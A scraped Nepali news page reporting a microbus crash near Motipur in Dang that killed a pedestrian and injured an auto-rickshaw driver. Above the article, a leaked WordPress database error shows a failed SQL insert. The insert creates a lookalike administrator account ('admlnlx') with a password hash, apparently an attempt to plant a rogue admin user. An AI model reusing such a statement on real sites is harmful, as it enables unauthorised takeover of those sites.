WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BInT85TmLE68w9zITk0eT/IxYGrHGs.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 03:54:48', '', 'admlnlx', 'admlnlx')
दाङ, पुस १२–
माइक्रोबसको ठक्करबाट दाङमा आज साँझ एक पैदलयात्रीको मृत्यु भएको छ ।
घोराही तुलसीपुर सडकखण्डअन्तर्गत मोतिपुर नजिकै आज साँझ करिब ६ बजे बा २ ख ७०२४ नम्बरको माइक्रोबसले ठक्कर दिदाँ तुलसीपुर–६ का ४१ वर्षीय निमा दमाईको उपचारका क्रममा अञ्चल अस्पताल दाङमा मृत्यु भएको इलाका प्रहरी कार्यालय तुलसीपुरका प्रहरी नायब उपरीक्षक लोकनाथ तिमिल्सिनाले जानकारी दिनुभयो ।
सोही माइक्रोबसले अटोरिक्सालाई ठक्कर दिँदा अटो रिक्सा चालक तुलसीपुर–६ का चन्द्रमणि वली गम्भीर घाइते भएकोसमेत प्रहरीले जनाएको छ । माइक्रोबसका चालकलाई प्रहरीले नियन्त्रणमा लिएको छ । घटनापछि स्थानीयवासीले सो सडक अवरुद्ध गरेर प्रदर्शन गरिरहेका छन् ।